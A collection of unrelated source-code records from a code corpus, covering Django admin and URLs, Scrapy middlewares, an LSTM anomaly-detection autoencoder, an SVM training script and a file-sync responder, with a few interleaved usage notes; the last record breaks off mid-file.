+{"seq_id":"509193079","text":"# Register your models here.\n#from django.contrib import admin\n#Activer l une ou l autre des 2 instruction ci dessous JPN 13/10/2015\nfrom django.contrib.gis import admin\n#from leaflet.admin import LeafletGeoAdmin\nfrom cnls.osmgeo_inline import OSMGeoTabularInline\n\n\nfrom .models import Organisme, Utilisateur, Action, Typeintervention, Cible, ActionLocalisation, ActionCible, ActionTypeintervention#, Status\n\n## PERMISSIONS (ajout nvx element de la liste) ##\n\nclass CibleAdmin(admin.ModelAdmin):\n\n def has_add_permission(self, request, obj=None):\n# return False\n return True\n\nclass TypeinterventionAdmin(admin.ModelAdmin):\n\n def has_add_permission(self, request, obj=None):\n return True\n\n\n## SECTIONS ##\n\n#class ActionCibleAdmin(admin.TabularInline):\nclass ActionCibleInline(admin.TabularInline):\n model = ActionCible\n extra = 2\n max_num = 3 # TODO Augmenter en production\n\n#class ActionTypeinterventionAdmin(admin.TabularInline):\nclass ActionTypeinterventionInline(admin.TabularInline):\n model = ActionTypeintervention \n extra = 2\n max_num = 3 # TODO Augmenter en production\n\n#class ActionLocalisationAdmin(admin.TabularInline):\n#class ActionLocalisationInline(admin.TabularInline):\nclass ActionLocalisationInline(OSMGeoTabularInline):\n model = ActionLocalisation \n extra = 1\n max_num = 2\n scale_text = False\n openlayers_url = '/static/OpenLayers.js'\n layerswitcher = False\n default_zoom = 3\n #'map_width': 200, 'map_height': 200, 'default_lon': -22, 'default_lat': 43, 'default_zoom': 10, 'layerswitcher': False, 'max_zoom': 15, 'min_zoom': 5, 'scale_text': False, 'debug' = True, }\n # cf. liste des paramètres modifiables https://github.com/django/django/blob/master/django/contrib/gis/admin/options.py\n\"\"\" \nclass ActionLocalisationAdmin(admin.OSMGeoAdmin):\n model = ActionLocalisation\n scale_text = False\n default_zoom = 3\n layerswitcher = False\n openlayers_url = '/static/OpenLayers.js'\n# map_width = 100\n# map_height = 100\n default_lon = -22\n default_lat = 43\n\"\"\"\n\n \n## L'Admin Principal compose des SECTIONS ##\n\nclass ActionAdmin(admin.ModelAdmin):\n#class ActionAdmin(admin.OSMGeoAdmin):\n model = Action\n radio_fields = {\"echelle_localisation\": admin.HORIZONTAL, \"devise\": admin.HORIZONTAL, \"avancement\": admin.HORIZONTAL}\n# inlines = [ActionLocalisationInline]#, ActionCibleInline, ActionTypeinterventionInline] # On a agrege les sections\n fieldsets = (\n (u'Informations générales', {\n 'fields': ('titre', 'organisme', 'typeintervention', 'cible', 'objectif', 'operateur',),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Localisation', {\n 'fields': ('echelle_localisation',),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Période', {\n 'fields': ('date_debut', 'date_fin', 'duree', 'avancement'),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Objectifs', {\n 'fields': ('objectif', 'priorite_psn', 'resultat_cf_annee_ant',),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Fonds', {\n 'fields': (('montant_prevu', 'montant_disponible',), 'devise', 'bailleurfond'),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n (u'Contact', {\n 'fields': ('createur', 'contact', 'origine'),\n 'classes': ('wide',),\n# 'description': 'texte ',\n }),\n\n (u'Informations avancées', {\n 'classes': ('wide',), #'collapse',),\n 'fields': ('description', 'commentaire'),\n }), \n )\n filter_horizontal = ('cible', 'typeintervention')\n \n\n# On enregistre les classes que 
l'on veut pouvoir modifier depuis l'interface d'administration, suivies éventuellement des modifications de l'interface par défaut\n\n#admin.site.register(mdgRegion, admin.OSMGeoAdmin)\nadmin.site.register(Organisme)\nadmin.site.register(Utilisateur)\nadmin.site.register(Action,ActionAdmin)\n#admin.site.register(ActionLocalisation, ActionLocalisationAdmin) #admin.OSMGeoAdmin) #, LeafletGeoAdmin)\nadmin.site.register(Typeintervention)\n\n#admin.site.register(Status)\nadmin.site.register(Cible)\n","sub_path":"cnls/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
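Note that ActionAdmin builds the inline sections but leaves the inlines assignment commented out; activating them is a one-liner. A sketch using the classes defined above (the subclass name is illustrative):

class ActionAdminWithSections(ActionAdmin):
    # edit targets, intervention types and localisations on the Action page
    inlines = [ActionLocalisationInline, ActionCibleInline, ActionTypeinterventionInline]

admin.site.unregister(Action)
admin.site.register(Action, ActionAdminWithSections)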
+{"seq_id":"654260841","text":"def process_ls(s):\n lines = []\n lines = s.splitlines()\n List = []\n ans = []\n for line in lines:\n if(line[0] != 'd'):\n List.append(line.split())\n for i in sorted(List, key = lambda x: (-int(x[4]), x[8:])): \n ans.append(' '.join(i[8:]))\n return ans\n","sub_path":"önn3/Python/ProcessIs.py","file_name":"ProcessIs.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"57424174","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('make_data', views.make_data, name='make_data'),\n\n path('post/', views.PostRUDView.as_view(), name='post_rud'),\n path('post/new', views.PostCreateView.as_view(), name='post_new'),\n]\n","sub_path":"frameworks/python/django/08_rest_crud/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"601387493","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/spider-middleware.html\n\nfrom scrapy import signals\nfrom random import choice\nfrom scrapy.http import HtmlResponse\nfrom selenium import webdriver\nfrom scrapy.exceptions import NotConfigured\nfrom scrapy.exceptions import CloseSpider\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nimport importlib\nimport os\nfrom pathlib import Path\n\nclass BabyscrapeSpiderMiddleware(object):\n # Not all methods need to be defined. If a method is not defined,\n # scrapy acts as if the spider middleware does not modify the\n # passed objects.\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_spider_input(self, response, spider):\n # Called for each response that goes through the spider\n # middleware and into the spider.\n\n # Should return None or raise an exception.\n return None\n\n def process_spider_output(self, response, result, spider):\n # Called with the results returned from the Spider, after\n # it has processed the response.\n\n # Must return an iterable of Request, dict or Item objects.\n for i in result:\n yield i\n\n def process_spider_exception(self, response, exception, spider):\n # Called when a spider or process_spider_input() method\n # (from other spider middleware) raises an exception.\n\n # Should return either None or an iterable of Request, dict\n # or Item objects.\n pass\n\n def process_start_requests(self, start_requests, spider):\n # Called with the start requests of the spider, and works\n # similarly to the process_spider_output() method, except\n # that it doesn’t have a response associated.\n\n # Must return only requests (not items).\n for r in start_requests:\n yield r\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n\nclass BabyscrapeDownloaderMiddleware(object):\n visited_pages =[]\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_request(self, request, spider):\n if 'robots.txt' not in request.url:\n if spider.name == 'hotel' and not spider.readmore_clicked:\n return self.readmore_click_response(request, spider)\n else:\n pass\n else:\n return None\n\n def readmore_click_response(self, request, spider):\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n options.add_argument(\"enable-automation\")\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-infobars\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--disable-browser-side-navigation\")\n options.add_argument(\"--disable-gpu\")\n driver = webdriver.Chrome(options=options)\n #driver = webdriver.Chrome('chromedriver_win.exe', options=options)\n driver.get(request.url)\n readmore_css = 'span._3maEfNCR:nth-of-type(1)'\n attempts = 0\n\n while attempts < 2:\n try:\n readmore_present = EC.presence_of_element_located((By.CSS_SELECTOR, readmore_css))\n element = WebDriverWait(driver, 
3).until(readmore_present)\n element.click()\n break\n except:\n attempts += 1\n print('Did not locate the \"Read more\" element, retrying: {}/2 '.format(attempts))\n if attempts == 2:\n driver.close()\n driver.quit()\n return HtmlResponse(url=request.url, body=\"Emergency\", encoding='utf-8', request=request)\n #raise CloseSpider(reason='Readmore Element not Found')\n\n body = driver.page_source\n drive_url = driver.current_url\n driver.close()\n driver.quit()\n spider.readmore_clicked = True\n return HtmlResponse(url=drive_url, body=body, encoding='utf-8', request=request)\n\n def process_response(self, request, response, spider):\n # Called with the response returned from the downloader.\n # Must either;\n # - return a Response object\n # - return a Request object\n # - or raise IgnoreRequest\n return response\n\n def process_exception(self, request, exception, spider):\n # Called when a download handler or a process_request()\n # (from other downloader middleware) raises an exception.\n\n # Must either:\n # - return None: continue processing this exception\n # - return a Response object: stops process_exception() chain\n # - return a Request object: stops process_exception() chain\n pass\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n\nclass RotateUserAgentMiddleware(object):\n \"\"\"Rotate user-agent for each request.\"\"\"\n def __init__(self, user_agents):\n self.enabled = False\n self.user_agents = user_agents\n\n @classmethod\n def from_crawler(cls, crawler):\n user_agents = crawler.settings.get('USER_AGENT_CHOICES', [])\n\n if not user_agents:\n raise NotConfigured(\"USER_AGENT_CHOICES not set or empty\")\n\n o = cls(user_agents)\n crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)\n return o\n\n def spider_opened(self, spider):\n self.enabled = getattr(spider, 'rotate_user_agent', self.enabled)\n\n def process_request(self, request, spider):\n if not self.enabled or not self.user_agents:\n return\n request.headers['user-agent'] = choice(self.user_agents)\n print('User agent switched to : ' + request.headers['user-agent'].decode(\"utf-8\"))\n\n","sub_path":"babyscrape/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
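None of these middlewares run until they are enabled in the project's settings.py; a sketch of the usual wiring (priority numbers and agent strings are illustrative), plus the spider flag that RotateUserAgentMiddleware reads via getattr in spider_opened:

# settings.py (sketch)
DOWNLOADER_MIDDLEWARES = {
    'babyscrape.middlewares.BabyscrapeDownloaderMiddleware': 543,
    'babyscrape.middlewares.RotateUserAgentMiddleware': 400,
}
USER_AGENT_CHOICES = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)',
]

# in the spider class: opt in to user-agent rotation
# rotate_user_agent = True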
+{"seq_id":"472186575","text":"from tensorflow.keras import optimizers\nfrom tensorflow.python.keras.layers import LSTM, RepeatVector, TimeDistributed, Dense\n\nfrom utils.algos.base_algos import SequentialMl\nfrom utils.dataset import Dataset, SequenceDataset\nfrom utils.preprocess import AnomalyDetection\nimport numpy as np\nimport pandas as pd\nimport os\nimport glob\nimport re\n\nclass Sequential(SequentialMl):\n\n def __init__(self, dataset, dataset_name, epochs=10, batch=64, lr=0.1):\n super().__init__(dataset, dataset_name=dataset_name, epochs=epochs, batch=batch, lr=lr)\n\n\n def compile_sequential(self):\n adam = optimizers.Adam(self.lr)\n self.sequential.compile(loss=\"mse\",\n optimizer=adam, metrics=['accuracy'])\n\n\nclass LSTMAutoencoder(Sequential):\n\n def __init__(self, dataset: Dataset, dataset_name, epochs=10, batch=64, lr=0.1):\n super().__init__(dataset=dataset, dataset_name=dataset_name, epochs=epochs, batch=batch, lr=lr)\n\n def init(self):\n super().init()\n timesteps, n_features = self.dataset.input_shape()\n\n self.sequential.add(\n LSTM(32, activation='relu', input_shape=(timesteps, n_features), return_sequences=True))\n self.sequential.add(LSTM(16, activation='relu', return_sequences=False))\n self.sequential.add(RepeatVector(timesteps))\n # Decoder\n self.sequential.add(LSTM(16, activation='relu', return_sequences=True))\n self.sequential.add(LSTM(32, activation='relu', return_sequences=True))\n self.sequential.add(TimeDistributed(Dense(n_features)))\n self.compile_sequential()\n\n\n\n\n def name(self):\n return \"LSTM Autoencoder\"\n\ndef clear_output_file():\n csvs = glob.glob('./../../results/**/*.csv', recursive=True)\n pngs = glob.glob('./../../results/**/*.png', recursive=True)\n for file in csvs + pngs:\n os.remove(file)\n\nif __name__ == '__main__':\n clear_output_file()\n names = []\n full_names = []\n regex = r\"Anomalies\\\\((.*?)\\.csv)\"\n for name in glob.glob('./../../data/Anomalies/*'):\n result = re.search(regex, name)\n if result:\n names.append(result.group(2))\n full_names.append(result.group(1))\n\n for i in range(len(full_names)):\n path = \"\"\n for step in range(3, 5):\n # Load and preprocess data\n preprocess_data = AnomalyDetection(data_path=\"./../../data/Anomalies/\" + full_names[i], seq_size=step, threshold_label=50)\n preprocess_data.preprocess()\n\n #Create an instant of SequenceDataset which already have some helpfull method. 
Example: load_test()..\n            dataset = SequenceDataset(preprocess_data)\n\n            # Create an instance of the model, which includes methods like train(), predict()...\n            model = LSTMAutoencoder(dataset=dataset, dataset_name=names[i]+\"/step\" + str(step), epochs=20, batch=64, lr=0.1)\n            preprocess_data.plot_data(data=preprocess_data.raw_data, title=names[i], path=model.pwd + model.image_path(names[i]))\n            # model.train()\n            model.load_model()\n            history = model.load_history()\n            model.plot_hist(history)\n            print(\"Model predict: \\n\", model.predict())\n\n            error_df = model.evaluation_metric(dataset.X_test, dataset.y_test)\n\n            model.ROC(error_df=error_df)\n            threshold_rt = model.precision_recal_curve(error_df)\n\n            max_accuracy, thres = model.best_accuracy(error_df=error_df, threshold_rt=threshold_rt)\n\n            model.confusion_matric(thres, error_df)\n            model.reconstruction_error_for_2_class(thres, error_df)\n\n            d = {\"DatasetName\": names[i], \"Step\": step, \"Threshold\": thres, \"Accuracy\": max_accuracy}\n            df = pd.DataFrame([d])\n            path = \"./../../results/\" + names[i] + \"/accuracies.csv\"\n            if os.path.exists(path):\n                df.to_csv(path, mode=\"a\", header=False)\n            else:\n                df.to_csv(path)\n            df = pd.read_csv(path)\n            df = df.sort_values(by=['Accuracy'], ascending=False)\n            df.to_csv(path)\n            break\n\n\n\n\n","sub_path":"utils/algos/sequential.py","file_name":"sequential.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
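The anomaly decision in this pipeline ultimately reduces to thresholding the autoencoder's reconstruction error per window. A minimal numpy sketch of that scoring step (illustrative, not the repo's evaluation_metric; shapes follow the (samples, timesteps, features) convention used above):

import numpy as np

def reconstruction_scores(model, X):
    # mean absolute reconstruction error, one score per input window
    X_hat = model.predict(X)                 # (n, timesteps, features)
    return np.mean(np.abs(X_hat - X), axis=(1, 2))

# windows whose score exceeds a threshold picked from the
# precision/recall curve are flagged as anomalous:
# flags = reconstruction_scores(model, X_test) > threshold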
+{"seq_id":"151362409","text":"\n\n#calss header\nclass _COT():\n\tdef __init__(self,): \n\t\tself.name = \"COT\"\n\t\tself.definitions = [u'a small bed for a baby or young child with high bars around the sides so that the child cannot fall out', u'a light bed that can be folded so that it can be easily carried and stored', u'a narrow bed']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_cot.py","file_name":"_cot.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"178835946","text":"import unittest\nimport webnotes\nimport copy\n\nfrom webnotes.model.doclist import DocList\nfrom webnotes.model.doc import Document\nfrom webnotes.model.code import get_obj\nfrom webnotes.utils import flt\n\nsql = webnotes.conn.sql\n\n\nclass TestAH(unittest.TestCase):\n\tdef setUp(self):\n\t\twebnotes.conn.begin()\n\n\tdef tearDown(self):\n\t\twebnotes.conn.rollback()\n\n\tdef testInsert(self):\n#\t\ttd = TestData()\n\t\td = DocList()\n\n\t\tcount_before = flt(sql(\"select count(*) from tab\"+_doctype)[0][0])\n\t\tif docok:\n\t\t\tfor i in docok:\n\t\t\t\td.doc = i\n\t\t\t\td.children = None\n\t\t\t\td.doc.fields['__islocal']=1\n\t\t\t\td.save(1)\n\t\tcount_after = flt(sql(\"select count(*) from tab\"+_doctype)[0][0])\n\t\tself.assertTrue(count_before+len(docok)==count_after)\n\n\tdef testFailAssert(self):\n#\t\ttd = TestData()\n\t\tif docnotok:\n\t\t\twith self.assertRaises(Exception) as context:\n\t\t\t\td = DocList()\n\t\t\t\td.doc = docnotok[0]\n\t\t\t\td.children = None\n\t\t\t\td.doc.fields['__islocal']=1\n\t\t\t\td.save(1)\n\n# Test Data\n\n#class TestData():\n\ntabOK =\t[\n\t\t{'account_name': 'acc1', 'parent_account': 'Indirect Expenses - TC', 'group_or_ledger': 'Ledger', 'is_pl_account': 'Yes', 'debit_or_credit': 'Debit', 'company': 'Test Company'},\n\t\t{'account_name': 'acc2', 'parent_account': 'Indirect Expenses - TC', 'group_or_ledger': 'Ledger', 'is_pl_account': 'Yes', 'debit_or_credit': 'Debit', 'company': 'Test Company'},\n\t\t{'account_name': 'acc3', 'parent_account': 'Indirect Expenses - TC', 'group_or_ledger': 'Ledger', 'is_pl_account': 'Yes', 'debit_or_credit': 'Debit', 'company': 'Test Company'}\n\t]\n\ntabNotOK = \t[\n\t\t]\n\n_doctype = 'Account'\n\nfor i in tabOK: i['doctype']=_doctype\nfor i in tabNotOK: i['doctype']=_doctype\n\ndocok = [Document(fielddata=r) for r in tabOK]\ndocnotok = [Document(fielddata=r) for r in tabNotOK]\n\n\n","sub_path":"erpnext/accounts/doctype/account/test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"347101115","text":"\nfrom . import plot_expr_graph as peg\nfrom .data_graph import FactorExprNode\n\ndef ggplot(data=None, aes=None):\n p = peg.BokehPlot(data)\n if aes is not None:\n return p + aes\n else:\n return p\n\ndef aes(x=None, y=None, **kw):\n return peg.Aes(**kw)\n\ndef geom_point(position=None, aes=None):\n \"\"\" **position** is one of the position_* adjustment\n functions like jitter, dodge, etc.\n \"\"\"\n g = peg.GeomPoint()\n if aes:\n g.aes = aes\n if position is not None:\n g.position = position\n return g\n \ndef geom_line(aes=None):\n if aes:\n g = peg.GeomLine(aes)\n else:\n g = peg.GeomLine()\n return g\n\ndef facet_grid(factor_expr):\n node = peg.FacetGrid()\n node.factor_expr = FactorExprNode.from_string_expr(factor_expr)\n return node\n\ndef facet_wrap(factor_expr):\n node = peg.FacetWrap()\n node.factor_expr = FactorExprNode.from_string_expr(factor_expr)\n return node\n\n\n\n\n\n","sub_path":"bokeh/attic/bokeh_ggplot.py","file_name":"bokeh_ggplot.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"199398783","text":"#!/usr/bin/python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\nimport linecache\n\ndef train_svm():\n\t'''\n\tPicking Veg(1004) and Facade (1400) as the two classes\n\tLet Veg have label 1\n\tLet Facade have label -1\n\t'''\n\n\tlam = 0.495\n\tnum_lines = open('training_set.node_features').read().count('\\n')\n\twts = 2 * np.random.uniform(0, 1, 10) - 1\n\tc = 0\n\tsse = []\n\titr = []\n\tfor i in range(num_lines):\n\t\tline = linecache.getline('training_set.node_features',i+1)\n\t\tvals = [float(j) for j in line.split()]\n\t\tfeature = vals[5:15]\n\t\tf_vec = np.asarray(feature,dtype=np.float32)\n\t\tnode_id = int(vals[4])\n\t\tif node_id == 1004 or node_id == 1400:\n\t\t\tc = c + 1\n\t\t\talpha_t = 0.01/np.sqrt(float(c))\n\t\t\tmodel_value = np.dot(wts, f_vec)\n\t\t\tif node_id == 1004: y = 1\n\t\t\telse : y = -1\n\t\t\teps = 0.0\n\t\t\tif model_value >= eps and node_id == 1004: # true positive\n\t\t\t\twts = wts - 2*alpha_t*lam*wts\n\t\t\telif model_value >= eps and node_id == 1400: # false positive\n\t\t\t\twts = wts - 2*alpha_t*lam*wts + alpha_t*y*f_vec\n\t\t\telif model_value < eps and node_id == 1004: # false negative\n\t\t\t\twts = wts - 2*alpha_t*lam*wts + alpha_t*y*f_vec\n\t\t\telif model_value < eps and node_id == 1400: # true negative\n\t\t\t\twts = wts - 2*alpha_t*lam*wts\n\n\t\t\tif c == 1:\n\t\t\t\tdiff = 0\n\t\t\t\titr.append(c)\n\t\t\t\tnum_lines = open('test_set.node_features').read().count('\\n')\n\t\t\t\tfor i in range(num_lines):\n\t\t\t\t\tline = linecache.getline('test_set.node_features',i+1)\n\t\t\t\t\tvals = [float(j) for j in line.split()]\n\t\t\t\t\tfeature = vals[5:15]\n\t\t\t\t\tf_vec = np.asarray(feature,dtype=np.float32)\n\t\t\t\t\tnode_id = int(vals[4])\n\t\t\t\t\tif node_id == 1004 or node_id == 1400:\n\t\t\t\t\t\tresult = np.dot(wts,f_vec)\n\t\t\t\t\t\tif node_id == 1004: y = 1\n\t\t\t\t\t\telse: y = -1\n\t\t\t\t\t\tdiff = diff + (y - result)**2\n\t\t\t\tsse.append(diff)\n\n\t\t\tif c%1000 == 0:\n\t\t\t\tdiff = 0\n\t\t\t\titr.append(c)\n\t\t\t\tnum_lines = open('test_set.node_features').read().count('\\n')\n\t\t\t\tfor i in range(num_lines):\n\t\t\t\t\tline = linecache.getline('test_set.node_features',i+1)\n\t\t\t\t\tvals = [float(j) for j in line.split()]\n\t\t\t\t\tfeature = vals[5:15]\n\t\t\t\t\tf_vec = np.asarray(feature,dtype=np.float32)\n\t\t\t\t\tnode_id = int(vals[4])\n\t\t\t\t\tif node_id == 1004 or node_id == 1400:\n\t\t\t\t\t\tresult = np.dot(wts,f_vec)\n\t\t\t\t\t\tif node_id == 1004: y = 1\n\t\t\t\t\t\telse: y = -1\n\t\t\t\t\t\tdiff = diff + (y - result)**2\n\t\t\t\tsse.append(diff)\n\n\tplt.plot(itr, sse, 'r--')\n\tplt.xlabel('Iteration Number')\n\tplt.ylabel('Sum Squared Error')\n\tplt.title('Error Convergence plot')\n\tplt.grid(True)\n\tplt.show()\n\n\nif __name__ == '__main__':\n\ttrain_svm()\n","sub_path":"lab2_svm_convergence_plots.py","file_name":"lab2_svm_convergence_plots.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"385780532","text":"__author__ = 'wbk3zd'\n\nimport os\nimport shutil\nimport threading\nimport time\nfrom copy import deepcopy\n\nimport zmq\n\ntry:\n from Helpers.Encodings import *\n from Helpers.Logging.OneDirLogger import EventLogger\nexcept ImportError:\n from FinalOneDir.Helpers.Encodings import *\n from FinalOneDir.Logging.OneDirLogger import EventLogger\n\n\nclass SyncResponder():\n def __init__(self, msg_identifier):\n #Components\n self.context = zmq.Context()\n self.logger = EventLogger()\n\n #Attributes\n self.msg_identifier = msg_identifier\n self.config = None\n self.listen_flag = threading.Event()\n self.listen_flag.clear()\n\n #Networking\n self.internal_request_lock = threading.RLock()\n self.internal_request_socket = self.context.socket(zmq.PUSH)\n self.server_sync_throw_lock = threading.RLock()\n self.server_sync_throw_socket = self.context.socket(zmq.SUB)\n\n \"\"\"\n Public methods\n \"\"\"\n def initialize(self, config):\n \"\"\"\n Sets up configuration values and connects sockets\n \"\"\"\n self.config = config\n\n #Initialize components\n logfile = \".\" + SLASH + \"responder.log\"\n self.logger.init_session(logfile)\n\n #Socket connections\n self.internal_request_socket.connect(\"tcp://localhost:\" + self.config[\"INTERNAL_REQUEST_PORT\"])\n self.logger.log(\"INFO\",\"Connecting responder to internal client controller over tcp port \" + self.config[\"INTERNAL_REQUEST_PORT\"] + \"...\")\n\n #Subscribe to sync throws for configured username\n self.server_sync_throw_socket.setsockopt(zmq.SUBSCRIBE, self.config[\"USERNAME\"].encode('ascii', 'replace'))\n self.server_sync_throw_socket.connect(\"tcp://\" + self.config[\"SERVER_ADDR\"] + \":\" + self.config[\"SERVER_SYNC_THROW_PORT\"])\n self.logger.log(\"INFO\",\"Subscribed to sync directives at tcp://\" + self.config[\"SERVER_ADDR\"] + \":\" + self.config[\"SERVER_SYNC_THROW_PORT\"] + \" for user \" + self.config[\"USERNAME\"] + \"...\")\n\n def start(self):\n \"\"\"\n Spawns a new thread with target _listen_ to listen for sync\n directives published by server.\n \"\"\"\n if self.listen_flag.is_set():\n return\n else:\n self.listen_flag.set()\n threading.Thread(target=self._listen_).start()\n self.logger.log(\"INFO\",\"Responder is listening for sync directives at tcp://\" + self.config[\"SERVER_ADDR\"] + \":\" + self.config[\"SERVER_SYNC_THROW_PORT\"] + \" for user \" + self.config[\"USERNAME\"] + \"...\")\n\n def pause(self):\n \"\"\"\n Causes any thread in _listen_ to exit gracefully\n \"\"\"\n self.logger.log(\"INFO\",\"Responder has paused. No longer listening for sync directives\")\n self.listen_flag.clear()\n\n def stop(self):\n \"\"\"\n Like pause, but allows for additional cleanup.\n Causes any thread in _listen_ to exit gracefully\n \"\"\"\n self.logger.log(\"INFO\",\"Responder is being killed. Going down permanently.\")\n self.listen_flag.clear()\n\n \"\"\"\n Protected methods\n \"\"\"\n def _listen_(self):\n \"\"\"\n Run in a separate thread. Listens for sync directives published by server\n for the subscribed username. 
Dispatches caught directives to a new thread\n for processing.\n \"\"\"\n while(self.listen_flag.is_set()):\n #Receive and dispatch until the end of time (or until listen_flag is cleared)\n msg = self.server_sync_throw_socket.recv_multipart()\n msg = decode(msg)\n\n #Remove topic from message where topic is username\n msg.remove(msg[0])\n\n #Dispatch command\n threading.Thread(target=self._dispatch_, args=(msg,)).start()\n\n #Strip away file contents before logging message\n msg_clone = deepcopy(msg)\n if msg_clone[0] == self.msg_identifier[\"FILESYNC\"]:\n msg_clone[-1] = \"\"\n\n #Log\n self.logger.log(\"INFO\",\"Sync Directive received: \" + str(msg_clone))\n\n\n def _dispatch_(self, msg):\n \"\"\"\n Entry point for all threads spawned from a message received in\n _listen_. Identifies the sync directive type and calls the appropriate\n internal method to handle.\n \"\"\"\n #Check to see if message was empty\n if not msg[0]:\n self.logger.log(\"ERROR\",\"Empty message received from server\")\n return\n\n #Send internal request to controller to stop daemon monitoring of directory, we are about to write\n out = [self.msg_identifier[\"STOP_MONITORING\"], str(threading.current_thread().ident)]\n with self.internal_request_lock:\n self.internal_request_socket.send_multipart(encode(out))\n\n #Give controller and daemon a moment to get their affairs in order\n time.sleep(1)\n\n #Dispatch\n if msg[0] == self.msg_identifier[\"FILESYNC\"]:\n self._on_sync_(msg)\n elif msg[0] == self.msg_identifier[\"MKDIR\"]:\n self._on_mkdir_(msg)\n elif msg[0] == self.msg_identifier[\"DELETE\"]:\n self._on_remove_(msg)\n elif msg[0] == self.msg_identifier[\"MOVE\"]:\n self._on_move_(msg)\n elif msg[0] == self.msg_identifier[\"KILL\"]:\n msg = [self.msg_identifier[\"KILL\"]]\n self.internal_request_socket.send_multipart(encode(msg)) #Notify controller of impending doom\n else:\n self.logger.log(\"ERROR\",\"Unrecognized message. Closing without handle: \" + str(msg))\n\n #Cleanup (resumes daemon)\n self._on_finish_()\n\n def _on_sync_(self, msg):\n \"\"\"\n Handles file sync events by writing sent contents\n to disk.\n \"\"\"\n #Get absolute path by appending path base\n dest_path = self.config[\"PATH_BASE\"] + msg[1]\n\n #Create the target directory if it does not exist\n if not os.path.exists(os.path.dirname(dest_path)):\n os.makedirs(os.path.dirname(dest_path))\n\n #Log and write\n self.logger.log(\"INFO\",\"Updating file at \" + dest_path)\n with open(dest_path, 'wb') as user_file:\n user_file.write(msg[2])\n\n def _on_mkdir_(self, msg):\n \"\"\"\n Creates a directory at the specified relative path if it does not exist\n \"\"\"\n #Create final destination by appending path base\n dest_path = self.config[\"PATH_BASE\"] + msg[1]\n\n #Create a directory, or not, the choice is yours\n if(os.path.isdir(dest_path)):\n self.logger.log(\"INFO\",\"Directory already exists, ignoring make command: \" + str(msg))\n else:\n self.logger.log(\"INFO\",\"Creating directory at \" + dest_path)\n os.makedirs(dest_path)\n\n def _on_remove_(self, msg):\n \"\"\"\n Deletes the filesystem object at the specified target, recursively if relevant\n \"\"\"\n dest_path = self.config[\"PATH_BASE\"] + msg[1]\n\n #If object does not exist, all done\n if not os.path.exists(dest_path):\n self.logger.log(\"WARNING\", dest_path + \" does not exist. 
